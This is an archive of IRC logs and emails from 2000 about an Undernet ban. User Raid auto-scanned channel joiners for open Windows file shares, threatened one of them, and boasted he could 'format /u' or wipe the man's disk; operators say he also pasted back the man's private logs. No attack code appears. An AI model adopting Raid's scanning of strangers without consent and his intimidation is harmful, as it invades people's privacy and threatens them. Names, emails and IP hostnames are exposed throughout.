this problem, if I was a jerk; I wouldn't have said a word.. just done mean things to him.
<Raid> thanks.
<CiCi> [13:29] (Raid): LC: So consider that a threat, lamer.[13:29] (Raid): LC: So consider
that a threat, lamer.
<Raid> Are you going to use the entire log, or out of context?
<Raid> I have no need to threaten CiCi. I could have kept my mouth shut.
<Raid> then anybody (even you) could access his entire system.
<Raid> and use it like you were sitting at the keyboard.
<Raid> I thought he might like to know about it.
<Raid> Next time I find somebody has this problem... shrug, I'll just keep quiet. I had no
idea you didn't know about this serious problem with windows machines.
<Raid> NT suffers from it as well.
<Raid> in fact, everytime you reboot; unless you manually set it otherwise, drive c: is
shared as open, with admin rights, no password.
<Raid> listen, if you really don't believe me, You can ask anybody you trust with computer
knowledge to checkout this log of our chat.
<Raid> I'm not bsing you.
<Raid> I was trying to save you some shame is all.
<Raid> (My boss thought it was funny as hell.)
<CiCi> you were trying to save me from shame?
<CiCi> heh
<Raid> erm, embarrasment rather
<Raid> it's not normal for an admin to not understand shared drives. ;p
<Raid> and you are an administrator. hehe
<CiCi> if your boss had a copy of your logs I don't think he'd think your actions were funny
<Raid> Admins are supposed to know these things, and if they don't check it out first.
<Raid> Actually, he was standing beside me the entire convo; including the one with chaplain.
<CiCi> if you were trying to help, that's one thing, but you were threatening and that's not
right
<Raid> He didn't believe me when I told him YOU were an ircop of undernet.
<CiCi> if you recall, you tried that same mess on me when you first met me
<Raid> I had to /whois and show him your "is an ircop" thingie.
<Raid> Listen, I had access to his computer, why threaten? Nothing he could do at that
point. he was mine for the kill if I wanted it.
<Raid> Instead, I told him he had a problem.
<Raid> and explained (which you did take out of context) that if I was a jerk, I could
easily format /u his hard disk, or even quicker, nuke his fat or registry.
<CiCi> why were you looking anyway?
<Raid> oh and btw, I'm not a teenager; or a script kiddy, I don't have any reason to bs you.
I'm perfectly capable of backing up what I say.
<Raid> I wasn't.
<Raid> My script autoscans people on joins, much like undernet does for open proxies.
<Raid> You might want to recommend undernet do this scan hehe
<Raid> it's even more serious to a users data then an open proxy.
<CiCi> uhm no
<CiCi> undernet isn't a nanny service
<Raid> Shrug, as I said... if you don't know about something, Check it out before accusing
me of doing something bad. I've been clean for almost 8 months. Haven't hacked a single thing.
<CiCi> the only things we look for are things that damage this network on a large scale
<CiCi> the admins would NEVER agree to such scans as yours done to all guests
<Raid> if they all knew about the bug in windows, I bet you they would.
<CiCi> now, I"m tired of you insulting me
<Raid> I'm sure some of you ircops login with windows boxes.
<Raid> I'm not trying to insult you.
<Raid> Actually I find you one of the cooler ircops i've talked too.
<Raid> I realize I may sound like a smartass; But it's seriously not intentional.
<Raid> I simply want to resolve this issue with you.
<Raid> I'm not worried about the authorities.
<Raid> I just don't like people thinking I've done something i didn't is all.
<CiCi> you scanned someone's machine and then said
<CiCi> [13:29] (Raid): LC: So consider that a threat, lamer.
<Raid> My script scanned him when he joined.
<CiCi> I haven't changed my opinion of your immature behavior
<Raid> hmmm
<CiCi> if you honestly wanted to help people by doing this, you wouldn't call them lamers
<Raid> Did you get the entire log, or just what I said to him?
<CiCi> do you have any clue what percentage of our undernet guests I could call lamers?
<Raid> IE: the first thing he said to me?
<CiCi> alot of them, but I don't
<Raid> I was minding my own business, he smarted off. I decided to tell him in open channel
(I was writing /msg to him) that he had a problem.
<CiCi> perhaps a lack of communication skills is the problem, I don't now, but I do know
that what you did was not good
<Raid> If I was immature as you seem to think, I'd have chewed his hard disk up right before
his eyes, and said nothing.
<CiCi> *shrug*
<CiCi> ahhh so he "smarted off" so you thought you'd put him in his place? that's typically
something a kid does
<Raid> a kid?
<Raid> No mam, A kid would have formatted him the second they were told an open share was
found.
<Raid> or stolen data or something.
<Raid> I told him about it, and since he was being a wiseass; I told everybody in the process.
<CiCi> pftt
<CiCi> that was very nice of you...... not
<CiCi> and that's my point
<Raid> would it have been nicer not to tell him?
<Raid> so somebody WITH the intention of harm could take advantage?
<CiCi> would have been more civil if you hadn't tried to act l33t with him
<Raid> I didn't try to act l33t.
<CiCi> and because you decided to show off and make a fool of someone, you made a mess
<Raid> I made no such mess, A misunderstanding of what exactly I did made a mess.
<Raid> Chaplain I bet didn't mention we go way back did he?
<Raid> I didn't show off, I already had the blasted privmsg typed... He decided to be a wise
one... So I cancelled it, and wrote a new one.
<CiCi> alot of people can hack, most of us don't, and most of us are mature enough not to
have a temper fit and announce a problem
<CiCi> enough
<Raid> Alright, fine. You don't believe me.. That's perfectly ok. All you need to do is
check ANY search engine (or even micrsoft) for the fix for this problem.
<Raid> they'll even tell you it's not a hack.
<Raid> it's a bug.
<CiCi> most invasions are bugs
<Raid> erm, I didn't invade him. Script checked for open shares, didn't establish connection
or map anything.
<Raid> it's no more intrusive then proxy scans. Users don't even notice it, and it doesn't
show up as an attack on any firewalls either; because it isnt.
<CiCi> *sigh* I'm finished with this now, you're wrong to threaten people, end of story
<Raid> ugh... Well, checkout what I said if you get a chance.
<Raid> and goodnight n stuff.

From John Grahms Sat Sep 9 10:07:29 2000


Received:
from [205.245.107.244] by web1610.mail.yahoo.com; Sat, 09
Sep 2000 10:07:29 PDT
Date:
Sat, 9 Sep 2000 10:07:29 -0700 (PDT)
From:
John Grahms <raidslam@yahoo.com> | Block address
Subject:
Hello
To:
abuse@undernet.org
MIME-Version:
1.0
Content-Type:
text/plain; charset=us-ascii
Content-Length:
9146

Add Addresses

Hi there. I thought you might like to know you have


one stupid ircop on undernet. Not only is she stupid,
but it's impossible to explain anything to her.

Her name is CiCi, and I just got klined for "hacking".


Full log follows. If you could deal with this for me,
I'd appreciate it.

Banned *@kpt-c-205-245-107-244.chartertn.net[1] until


Sat Sep 09 05:57:09PM 2000 GMT [968522229]: this is
not a playground for you to port scan and invade
other's machines .

Heres my kline (I went out to get some food, she


klined me when I left) Heres the log of all channel
activity up to my kline.
[12:25] *** Now talking in #CHristian
[12:25] -logos3- http://www.forchrist.net - channel
website, for rules and other info.
[12:25] <Raid> mornin
[12:26] *** LC
(LC@PPPa26-ResaleNashville6-2R7047.saturn.bbn.com) has
joined #CHristian
[12:26] *** Txico
(peter@cpt-dial-196-30-182-178.mweb.co.za) Quit (Ping
timeout for Txico[cpt-dial-196-30-182-178.mweb.co.za])
[12:26] <CiCi> ok everyone, when Raid's in the
channel, all your machines are going to be scanned so
be prepared
[12:27] * CiCi waits for Raid to meet her router that
doesn't appreciate script kiddie probes
[12:27] <Raid> CiCi: Actually, I've turned the script
off.
[12:28] <Raid> CiCi: I didn't want to risk having to
explain what netbios open shares are again. ;p

And heres the wonderful log last night of us chatting.


This is a long read, but it seriously shows little
intelligence on her part. Where did you get this lady?

Session Start: Fri Sep 08 23:01:35 2000


Session Ident: CiCi (~ci@fearnot.iadfw.net)
>/whois cici
CiCi is ~ci@fearnot.iadfw.net * God Can!
CiCi on #christian
CiCi using dallas.tx.us.undernet.org www.airmail.net
CiCi is an IRC Operator
cici End of /WHOIS list.

<CiCi> why?
<Raid> I don't think you quiet understand what you
erm, reported me for. heh
<Raid> Mr chaplain had open shared drives. I didn't do
anything to him, I told him it was there; I even
directed him to a website for zone alarm. (firewall;
fixes that problem)
<Raid> I told him if I was a jerk as he said, I would
have formatted him.
<Raid> I didn't do so. hehe
<Raid> I didn't "hack" him or anything.
<Raid> His computer isn't setup properly.
<Raid> His entire c: drive is wide open to anybody;
even you.
<CiCi> ok, let me go read these logs again with that
in mind, brb
<Raid> So when I'm contacted by the authorities, (they
already know about this serious security problem.. )
they'll probably get a chuckle out of it. As I told
chaplain he had this problem, if I was a jerk; I
wouldn't have said a word.. just done mean things to
him.
<Raid> thanks.
<CiCi> [13:29] (Raid): LC: So consider that a threat,
lamer.[13:29] (Raid): LC: So consider that a threat,
lamer.
<Raid> Are you going to use the entire log, or out of
context?
<Raid> I have no need to threaten CiCi. I could have
kept my mouth shut.
<Raid> then anybody (even you) could access his entire
system.
<Raid> and use it like you were sitting at the
keyboard.
<Raid> I thought he might like to know about it.
<Raid> Next time I find somebody has this problem...
shrug, I'll just keep quiet. I had no idea you didn't
know about this serious problem with windows machines.
<Raid> NT suffers from it as well.
<Raid> in fact, everytime you reboot; unless you
manually set it otherwise, drive c: is shared as open,
with admin rights, no password.
<Raid> listen, if you really don't believe me, You can
ask anybody you trust with computer knowledge to
checkout this log of our chat.
<Raid> I'm not bsing you.
<Raid> I was trying to save you some shame is all.
<Raid> (My boss thought it was funny as hell.)
<CiCi> you were trying to save me from shame?
<CiCi> heh
<Raid> erm, embarrasment rather
<Raid> it's not normal for an admin to not understand
shared drives. ;p
<Raid> and you are an administrator. hehe
<CiCi> if your boss had a copy of your logs I don't
think he'd think your actions were funny
<Raid> Admins are supposed to know these things, and
if they don't check it out first.
<Raid> Actually, he was standing beside me the entire
convo; including the one with chaplain.
<CiCi> if you were trying to help, that's one thing,
but you were threatening and that's not right
<Raid> He didn't believe me when I told him YOU were
an ircop of undernet.
<CiCi> if you recall, you tried that same mess on me
when you first met me
<Raid> I had to /whois and show him your "is an ircop"
thingie.
<Raid> Listen, I had access to his computer, why
threaten? Nothing he could do at that point. he was
mine for the kill if I wanted it.
<Raid> Instead, I told him he had a problem.
<Raid> and explained (which you did take out of
context) that if I was a jerk, I could easily format
/u his hard disk, or even quicker, nuke his fat or
registry.
<CiCi> why were you looking anyway?
<Raid> oh and btw, I'm not a teenager; or a script
kiddy, I don't have any reason to bs you. I'm
perfectly capable of backing up what I say.
<Raid> I wasn't.
<Raid> My script autoscans people on joins, much like
undernet does for open proxies.
<Raid> You might want to recommend undernet do this
scan hehe
<Raid> it's even more serious to a users data then an
open proxy.
<CiCi> uhm no
<CiCi> undernet isn't a nanny service
<Raid> Shrug, as I said... if you don't know about
something, Check it out before accusing me of doing
something bad. I've been clean for almost 8 months.
Haven't hacked a single thing.
<CiCi> the only things we look for are things that
damage this network on a large scale
<CiCi> the admins would NEVER agree to such scans as
yours done to all guests
<Raid> if they all knew about the bug in windows, I
bet you they would.
<CiCi> now, I"m tired of you insulting me
<Raid> I'm sure some of you ircops login with windows
boxes.
<Raid> I'm not trying to insult you.
<Raid> Actually I find you one of the cooler ircops
i've talked too.
<Raid> I realize I may sound like a smartass; But it's
seriously not intentional.
<Raid> I simply want to resolve this issue with you.
<Raid> I'm not worried about the authorities.
<Raid> I just don't like people thinking I've done
something i didn't is all.
<CiCi> you scanned someone's machine and then said
<CiCi> [13:29] (Raid): LC: So consider that a threat,
lamer.
<Raid> My script scanned him when he joined.
<CiCi> I haven't changed my opinion of your immature
behavior
<Raid> hmmm
<CiCi> if you honestly wanted to help people by doing
this, you wouldn't call them lamers
<Raid> Did you get the entire log, or just what I said
to him?
<CiCi> do you have any clue what percentage of our
undernet guests I could call lamers?
<Raid> IE: the first thing he said to me?
<CiCi> alot of them, but I don't
<Raid> I was minding my own business, he smarted off.
I decided to tell him in open channel (I was writing
/msg to him) that he had a problem.
<CiCi> perhaps a lack of communication skills is the
problem, I don't now, but I do know that what you did
was not good
<Raid> If I was immature as you seem to think, I'd
have chewed his hard disk up right before his eyes,
and said nothing.
<CiCi> *shrug*
<CiCi> ahhh so he "smarted off" so you thought you'd
put him in his place? that's typically something a
kid does
<Raid> a kid?
<Raid> No mam, A kid would have formatted him the
second they were told an open share was found.
<Raid> or stolen data or something.
<Raid> I told him about it, and since he was being a
wiseass; I told everybody in the process.
<CiCi> pftt
<CiCi> that was very nice of you...... not
<CiCi> and that's my point
<Raid> would it have been nicer not to tell him?
<Raid> so somebody WITH the intention of harm could
take advantage?
<CiCi> would have been more civil if you hadn't tried
to act l33t with him
<Raid> I didn't try to act l33t.
<CiCi> and because you decided to show off and make a
fool of someone, you made a mess
<Raid> I made no such mess, A misunderstanding of what
exactly I did made a mess.
<Raid> Chaplain I bet didn't mention we go way back
did he?
<Raid> I didn't show off, I already had the blasted
privmsg typed... He decided to be a wise one... So I
cancelled it, and wrote a new one.
<CiCi> alot of people can hack, most of us don't, and
most of us are mature enough not to have a temper fit
and announce a problem
<CiCi> enough
<Raid> Alright, fine. You don't believe me.. That's
perfectly ok. All you need to do is check ANY search
engine (or even micrsoft) for the fix for this
problem.
<Raid> they'll even tell you it's not a hack.
<Raid> it's a bug.
<CiCi> most invasions are bugs
<Raid> erm, I didn't invade him. Script checked for
open shares, didn't establish connection or map
anything.
<Raid> it's no more intrusive then proxy scans. Users
don't even notice it, and it doesn't show up as an
attack on any firewalls either; because it isnt.
<CiCi> *sigh* I'm finished with this now, you're wrong
to threaten people, end of story
<Raid> ugh... Well, checkout what I said if you get a
chance.
<Raid> and goodnight n stuff.

Please deal with her, I don't like being klined for


Bullshit. Thank YOu kindly.

From L. Maurer Sat Sep 9 10:51:29 2000


X-Apparently-To:
raidslam@yahoo.com via web1609.mail.yahoo.com
Received:
from mail.airmail.net (206.66.12.40) by mta223.mail.yahoo.com
with SMTP; 09 Sep 2000 12:54:17 -0700 (PDT)
Received:
from faith from [204.181.101.66] by mail.airmail.net (/\##/\
Smail3.1.30.16 #30.438) with smtp for <raidslam@yahoo.com>
sender: <lmaurer@iadfw.net> id
<mT/13Xokf-0008rfT@mail.airmail.net>; Sat, 9 Sep 2000
12:49:17 -0500 (CDT)
Message-Id:
<3.0.32.20000909125128.0283b380@mail.iadfw.net>
X-Sender:
lmaurer@mail.iadfw.net
X-Mailer:
Windows Eudora Pro Version 3.0 (32)
Date:
Sat, 09 Sep 2000 12:51:29 -0500
To:
John Grahms <raidslam@yahoo.com>
From:
"L. Maurer" <lmaurer@iadfw.net> | Block address
Subject:
Re: [Abuse] Hello
CC:
abuse@undernet.org
Mime-Version:
1.0
Content-Type:
text/plain; charset="us-ascii"
Content-Length:
10041

Add
Addresses

You were removed because you were actively scanning others machines as
they
joined the channel, invading those machines when possible, and pasting
their private chat logs back to them. You have been asked to stop
doing
this for over 24 hours and the requests were met with an attitude from
you
that you were very much entitled to invade and compromise machines when
someone irritated you on Undernet. Don't think for one minute that this
is
either legal or appreciated using Undernet bandwidth. If this is
repeated
by you when your gline expires, expect another one.

Ci_Ci
Admin. Dallas.TX.US.Undernet.Org

At 10:07 AM 9/9/00 -0700, you wrote:


>Hi there. I thought you might like to know you have
>one stupid ircop on undernet. Not only is she stupid,
>but it's impossible to explain anything to her.
>
>Her name is CiCi, and I just got klined for "hacking".
>Full log follows. If you could deal with this for me,
>I'd appreciate it.
>
>Banned *@kpt-c-205-245-107-244.chartertn.net[1] until
>Sat Sep 09 05:57:09PM 2000 GMT [968522229]: this is
>not a playground for you to port scan and invade
>other's machines .
>
>Heres my kline (I went out to get some food, she
>klined me when I left) Heres the log of all channel
>activity up to my kline.
>[12:25] *** Now talking in #CHristian
>[12:25] -logos3- http://www.forchrist.net - channel
>website, for rules and other info.
>[12:25] <Raid> mornin
>[12:26] *** LC
>(LC@PPPa26-ResaleNashville6-2R7047.saturn.bbn.com) has
>joined #CHristian
>[12:26] *** Txico
>(peter@cpt-dial-196-30-182-178.mweb.co.za) Quit (Ping
>timeout for Txico[cpt-dial-196-30-182-178.mweb.co.za])
>[12:26] <CiCi> ok everyone, when Raid's in the
>channel, all your machines are going to be scanned so
>be prepared
>[12:27] * CiCi waits for Raid to meet her router that
>doesn't appreciate script kiddie probes
>[12:27] <Raid> CiCi: Actually, I've turned the script
>off.
>[12:28] <Raid> CiCi: I didn't want to risk having to
>explain what netbios open shares are again. ;p
>
>And heres the wonderful log last night of us chatting.
>This is a long read, but it seriously shows little
>intelligence on her part. Where did you get this lady?
>
>
>Session Start: Fri Sep 08 23:01:35 2000
>Session Ident: CiCi (~ci@fearnot.iadfw.net)
>>/whois cici
>CiCi is ~ci@fearnot.iadfw.net * God Can!
>CiCi on #christian
>CiCi using dallas.tx.us.undernet.org www.airmail.net
>CiCi is an IRC Operator
>cici End of /WHOIS list.
>
><CiCi> why?
><Raid> I don't think you quiet understand what you
>erm, reported me for. heh
><Raid> Mr chaplain had open shared drives. I didn't do
>anything to him, I told him it was there; I even
>directed him to a website for zone alarm. (firewall;
>fixes that problem)
><Raid> I told him if I was a jerk as he said, I would
>have formatted him.
><Raid> I didn't do so. hehe
><Raid> I didn't "hack" him or anything.
><Raid> His computer isn't setup properly.
><Raid> His entire c: drive is wide open to anybody;
>even you.
><CiCi> ok, let me go read these logs again with that
>in mind, brb
><Raid> So when I'm contacted by the authorities, (they
>already know about this serious security problem.. )
>they'll probably get a chuckle out of it. As I told
>chaplain he had this problem, if I was a jerk; I
>wouldn't have said a word.. just done mean things to
>him.
><Raid> thanks.
><CiCi> [13:29] (Raid): LC: So consider that a threat,
>lamer.[13:29] (Raid): LC: So consider that a threat,
>lamer.
><Raid> Are you going to use the entire log, or out of
>context?
><Raid> I have no need to threaten CiCi. I could have
>kept my mouth shut.
><Raid> then anybody (even you) could access his entire
>system.
><Raid> and use it like you were sitting at the
>keyboard.
><Raid> I thought he might like to know about it.
><Raid> Next time I find somebody has this problem...
>shrug, I'll just keep quiet. I had no idea you didn't
>know about this serious problem with windows machines.
><Raid> NT suffers from it as well.
><Raid> in fact, everytime you reboot; unless you
>manually set it otherwise, drive c: is shared as open,
>with admin rights, no password.
><Raid> listen, if you really don't believe me, You can
>ask anybody you trust with computer knowledge to
>checkout this log of our chat.
><Raid> I'm not bsing you.
><Raid> I was trying to save you some shame is all.
><Raid> (My boss thought it was funny as hell.)
><CiCi> you were trying to save me from shame?
><CiCi> heh
><Raid> erm, embarrasment rather
><Raid> it's not normal for an admin to not understand
>shared drives. ;p
><Raid> and you are an administrator. hehe
><CiCi> if your boss had a copy of your logs I don't
>think he'd think your actions were funny
><Raid> Admins are supposed to know these things, and
>if they don't check it out first.
><Raid> Actually, he was standing beside me the entire
>convo; including the one with chaplain.
><CiCi> if you were trying to help, that's one thing,
>but you were threatening and that's not right
><Raid> He didn't believe me when I told him YOU were
>an ircop of undernet.
><CiCi> if you recall, you tried that same mess on me
>when you first met me
><Raid> I had to /whois and show him your "is an ircop"
>thingie.
><Raid> Listen, I had access to his computer, why
>threaten? Nothing he could do at that point. he was
>mine for the kill if I wanted it.
><Raid> Instead, I told him he had a problem.
><Raid> and explained (which you did take out of
>context) that if I was a jerk, I could easily format
>/u his hard disk, or even quicker, nuke his fat or
>registry.
><CiCi> why were you looking anyway?
><Raid> oh and btw, I'm not a teenager; or a script
>kiddy, I don't have any reason to bs you. I'm
>perfectly capable of backing up what I say.
><Raid> I wasn't.
><Raid> My script autoscans people on joins, much like
>undernet does for open proxies.
><Raid> You might want to recommend undernet do this
>scan hehe
><Raid> it's even more serious to a users data then an
>open proxy.
><CiCi> uhm no
><CiCi> undernet isn't a nanny service
><Raid> Shrug, as I said... if you don't know about
>something, Check it out before accusing me of doing
>something bad. I've been clean for almost 8 months.
>Haven't hacked a single thing.
><CiCi> the only things we look for are things that
>damage this network on a large scale
><CiCi> the admins would NEVER agree to such scans as
>yours done to all guests
><Raid> if they all knew about the bug in windows, I
>bet you they would.
><CiCi> now, I"m tired of you insulting me
><Raid> I'm sure some of you ircops login with windows
>boxes.
><Raid> I'm not trying to insult you.
><Raid> Actually I find you one of the cooler ircops
>i've talked too.
><Raid> I realize I may sound like a smartass; But it's
>seriously not intentional.
><Raid> I simply want to resolve this issue with you.
><Raid> I'm not worried about the authorities.
><Raid> I just don't like people thinking I've done
>something i didn't is all.
><CiCi> you scanned someone's machine and then said
><CiCi> [13:29] (Raid): LC: So consider that a threat,
>lamer.
><Raid> My script scanned him when he joined.
><CiCi> I haven't changed my opinion of your immature
>behavior
><Raid> hmmm
><CiCi> if you honestly wanted to help people by doing
>this, you wouldn't call them lamers
><Raid> Did you get the entire log, or just what I said
>to him?
><CiCi> do you have any clue what percentage of our
>undernet guests I could call lamers?
><Raid> IE: the first thing he said to me?
><CiCi> alot of them, but I don't
><Raid> I was minding my own business, he smarted off.
>I decided to tell him in open channel (I was writing
>/msg to him) that he had a problem.
><CiCi> perhaps a lack of communication skills is the
>problem, I don't now, but I do know that what you did
>was not good
><Raid> If I was immature as you seem to think, I'd
>have chewed his hard disk up right before his eyes,
>and said nothing.
><CiCi> *shrug*
><CiCi> ahhh so he "smarted off" so you thought you'd
>put him in his place? that's typically something a
>kid does
><Raid> a kid?
><Raid> No mam, A kid would have formatted him the
>second they were told an open share was found.
><Raid> or stolen data or something.
><Raid> I told him about it, and since he was being a
>wiseass; I told everybody in the process.
><CiCi> pftt
><CiCi> that was very nice of you...... not
><CiCi> and that's my point
><Raid> would it have been nicer not to tell him?
><Raid> so somebody WITH the intention of harm could
>take advantage?
><CiCi> would have been more civil if you hadn't tried
>to act l33t with him
><Raid> I didn't try to act l33t.
><CiCi> and because you decided to show off and make a
>fool of someone, you made a mess
><Raid> I made no such mess, A misunderstanding of what
>exactly I did made a mess.
><Raid> Chaplain I bet didn't mention we go way back
>did he?
><Raid> I didn't show off, I already had the blasted
>privmsg typed... He decided to be a wise one... So I
>cancelled it, and wrote a new one.
><CiCi> alot of people can hack, most of us don't, and
>most of us are mature enough not to have a temper fit
>and announce a problem
><CiCi> enough
><Raid> Alright, fine. You don't believe me.. That's
>perfectly ok. All you need to do is check ANY search
>engine (or even micrsoft) for the fix for this
>problem.
><Raid> they'll even tell you it's not a hack.
><Raid> it's a bug.
><CiCi> most invasions are bugs
><Raid> erm, I didn't invade him. Script checked for
>open shares, didn't establish connection or map
>anything.
><Raid> it's no more intrusive then proxy scans. Users
>don't even notice it, and it doesn't show up as an
>attack on any firewalls either; because it isnt.
><CiCi> *sigh* I'm finished with this now, you're wrong
>to threaten people, end of story
><Raid> ugh... Well, checkout what I said if you get a
>chance.
><Raid> and goodnight n stuff.
>
>Please deal with her, I don't like being klined for
>Bullshit. Thank YOu kindly.
>
>
>
>__________________________________________________
>Do You Yahoo!?
>Yahoo! Mail - Free email you can access from anywhere!
>http://mail.yahoo.com/
>
From John Grahms Sat Sep 9 16:06:45 2000
Received:
from [205.245.105.248] by web1610.mail.yahoo.com; Sat, 09
Sep 2000 16:06:45 PDT
Date:
Sat, 9 Sep 2000 16:06:45 -0700 (PDT)
From:
John Grahms <raidslam@yahoo.com> | Block address
Subject:
Re: [Abuse] Hello
To:
Gator <gator@cajun-gator.net>
MIME-Version:
1.0
Content-Type:
text/plain; charset=us-ascii
Content-Length:
1641

Add Addresses

--- Gator <gator@cajun-gator.net> wrote:


> File shares were not a big problem in the past when
> users were mostly on
> modems. Windows would warn you if you enabled file
> sharing on your modem.
> However, today in the world of cable and dsl, these
> devices usually use
> network cards, the same is not true. Windows not
> only does not warn you if
> you enable file shares on your network card
> device(s), but with the default
> bindings and filesharing installed you are
> vulnerable. Your drives are open
> to the public and there are quiet a few virii and
> trojans that actually
> exploit this to spread.
>
> So in short the man is right about it being a
> problem. I have no idea what
> he did with that information however.

I told the user he had a problem, and suggested he get


Zone alarm firewall; I've got those logs too if you
should need them. I did NOT at any time access his
machine, nor map any drives to mine. I was informed he
was vulnerable; I told him.

I tried to explain this to CiCi, but she clearly


couldn't understand such a simple concept of telling
somebody they have a real serious problem.

I did NOT attack mr chaplains computer at any time,


and she didn't gline me last night. She glined me
today; She had plenty of time to gline last night.
Regardless, her gline wasn't valid. I did not use the
information that my script told me about for anything
bad, And I'd appreciate it if yuo could explain this
to her, so I don't have to deal with this BS.

From John Grahms Sat Sep 9 17:18:10 2000


Received:
from [205.245.105.248] by web1604.mail.yahoo.com; Sat, 09
Sep 2000 17:18:10 PDT
Date:
Sat, 9 Sep 2000 17:18:10 -0700 (PDT)
From:
John Grahms <raidslam@yahoo.com> | Block address
Subject:
Re: [Abuse] Hello
To:
"L. Maurer" <lmaurer@iadfw.net>
CC:
gator@cajun-gator.net
MIME-Version:
1.0
Content-Type:
multipart/mixed; boundary="0-160051528-968545090=:19289"
Content-Length:
111621

Add
Addresses

--- "L. Maurer" <lmaurer@iadfw.net> wrote:


> You were removed because you were actively scanning
> others machines as they joined the channel,
invading > those machines when possible, and pasting
> their private chat logs back to them.

Incorrect. and I have logs not only from me to prove


this, but from others present during the convo. Your
defiantly in the wrong. I did not invade ANY machines,
and i'd love to see your proof stating otherwise. I'm
sure my boss would as well. Being as he was present
during the initial conversation with Chaplain. Even he
knew about the shared drives problem on windows
machines. He did not believe me when I told him you
were an Oper on undernet; I actually had to /whois you
to show him it! My script didn't do anything harmful
to anyones machine. And I didn't do anything harmful
with the information it told me either, I informed
users they had a problem if it found one, and I
suggested they obtain Zone Alarm firewall.

> You have been asked to stop doing


> this for over 24 hours and the requests were met

Oh really? That's not exactly true, now is it. The


second I logged in today (as the log of today shows, I
've attached it to this message) you made a public
comment about me scanning people (not exactly true,
nor correct) I responded and plainly told you I had
turned the script off, because I was tired of
explaining shared drives to people. Actually, your the
first who didn't know about the problem. Since My
little run in(which I sent to abuse@undernet) with yuo
last night. I then set away.. I was gone maybe 16
minutes.. I went to get some food at Burger king...
When I came back, YOU GLINED me. I flat out told you
the script was no longer active; YOU THEN GLINED ME
AFTER I left. Nah, I didn't do anything against
undernet policy CiCi, and you damn well know it.

> with an attitude from you that you were very much >
entitled to invade and compromise machines when

Not true. You said in channel that I was hacking (I


have that log too) chaplain. You also informed me I
had been reported to the authorities; and should be
expecting a call from his lawyer soon. I'm still
waiting for that call btw.

> Don't think for one minute that this is either


legal > or appreciated using Undernet bandwidth.

Real network aware one you are... I wasn't using


undernet bandwidth running my script...And what my
script was doing is damn sure not illegal. Unless your
going to tell me undernets proxy scans of me everytime
I connect is also illegal? I didn't do anything
different. I didn't map any of his drives to my
system. (I only knew that he had that available). I
was nice enough to tell him he had a problem.

> If this is repeated by you when your gline expires,


> expect another one.

LOL! Fine. Expect an email with logs to


abuse@undernet.org everytime you do so. I'm not one
usually for getting glines. Nice try, CiCi.

It's obvious you have a personal problem with me,


That's fine. Still not a reason for you to abuse your
own networks policy and gline me for it Glining me
from your server would be different, but... Personal
problems can easily be resolved via ignore. Not to
mention the fellow you glined last night for swearing
in a channel you don't even op in. I've got that log
too ;p

I've also heard from others (and I'm sure they have
logs) that you've been abusing your Oline for some
time now. glining people for channel matters; Of which
you have no status in. Just because you "hangout" in a
channel doesn't give you the right to gline people
from the entire undernet; Thats what the channel has
ops for.

I carbon copied this email to Gator, I simply don't


trust you enough to send him copies of this entire
email. You quoted me out of context once already.

The log file is kinda large; scroll down for the


relevant info.

__________________________________________________
Do You Yahoo!?
Yahoo! Mail - Free email you can access from anywhere!
http://mail.yahoo.com/

> Gator

From L. Maurer Sun Sep 10 13:03:41 2000


X-Apparently-To:
raidslam@yahoo.com via web1602.mail.yahoo.com
Received:
from mail.airmail.net (206.66.12.40) by mta116.mail.yahoo.com
with SMTP; 10 Sep 2000 13:18:21 -0700 (PDT)
Received:
from faith from [204.181.101.66] by mail.airmail.net (/\##/\
Smail3.1.30.16 #30.438) with smtp for <raidslam@yahoo.com>
sender: <lmaurer@iadfw.net> id
<mT/13YDIW-0007t3T@mail.airmail.net>; Sun, 10 Sep 2000
15:01:52 -0500 (CDT)
Message-Id:
<3.0.32.20000910150340.00ce3410@mail.iadfw.net>
X-Sender:
lmaurer@mail.iadfw.net
X-Mailer:
Windows Eudora Pro Version 3.0 (32)
Date:
Sun, 10 Sep 2000 15:03:41 -0500
To:
John Grahms <raidslam@yahoo.com>
From:
"L. Maurer" <lmaurer@iadfw.net> | Block address
Subject:
Re: [Abuse] Hello
CC:
gator@cajun-gator.net
Mime-Version:
1.0
Content-Type:
text/plain; charset="us-ascii"
Content-Length:
5115

Add
Addresses

At 05:18 PM 9/9/00 -0700, John Grahms wrote:


>Incorrect. and I have logs not only from me to prove
>this, but from others present during the convo. Your
>defiantly in the wrong. I did not invade ANY machines,
>and i'd love to see your proof stating otherwise.

Then explain how you were pasting back private chat logs that Chaplain
had
with others :/ When I first chatted with you about this, you told me
you
wouldn't have done anything to him but because he was a smart alec, or
something of that nature, you thought you were within your right to do
this. Just because you CAN hit a child doesn't mean it's the proper
thing
to do and most of our undernet guests are virtual children. We don't
take
advantage of that fact.

>
>Not true. You said in channel that I was hacking (I
>have that log too) chaplain.

I'm not Chaplain. Get your people straight. There is more than one
person
here who has been effected by your actions and AFAIK Chaplain isn't
reading
this email.

>You also informed me I


>had been reported to the authorities; and should be
>expecting a call from his lawyer soon. I'm still
>waiting for that call btw.

I told you nothing of the sort. Once again, get your people straight.
It is
my understanding that Chaplain has contacted his church's attorney and
that
since you both live in the same state, there is merit for suit. That's
all
I know about that and that's all I want to know about it.

>
>Real network aware one you are... I wasn't using
>undernet bandwidth running my script...And what my
>script was doing is damn sure not illegal. Unless your
>going to tell me undernets proxy scans of me everytime
>I connect is also illegal? I didn't do anything
>different.

OK, if you weren't using undernet bandwidth, explain how you knew the
IP/host information of the people you were scanning. You were scanning
everyone that entered a channel on Undernet without their consent. The
"consent" part is the difference between your scans and the proxy scans
Undernet does. If you read the motd of most servers, you'll see that it
is
discussed there. If users don't want to be scanned for the most
commonly
abused ports being open, they are free to disconnect to Undernet. You
made
none of this information available to people who entered the channel
and
you had no permission from them to scan their machines.

>I didn't map any of his drives to my


>system. (I only knew that he had that available). I
>was nice enough to tell him he had a problem.
>

Calling someone a lamer doesn't sound like my idea of nice and telling
them
to "consider this a threat" doesn't sound very kind either.

>It's obvious you have a personal problem with me,


>That's fine. Still not a reason for you to abuse your
>own networks policy and gline me for it Glining me
>from your server would be different, but... Personal
>problems can easily be resolved via ignore.

I don't have a personal problem with you so the rest of the above
paragraph
is of no concern. My problem with you was that you were sitting on
Undernet
scanning the machines of each person joining a channel.

>Not to
>mention the fellow you glined last night for swearing
>in a channel you don't even op in. I've got that log
>too ;p
>
>I've also heard from others (and I'm sure they have
>logs) that you've been abusing your Oline for some
>time now. glining people for channel matters; Of which
>you have no status in. Just because you "hangout" in a
>channel doesn't give you the right to gline people
>from the entire undernet; Thats what the channel has
>ops for.
>

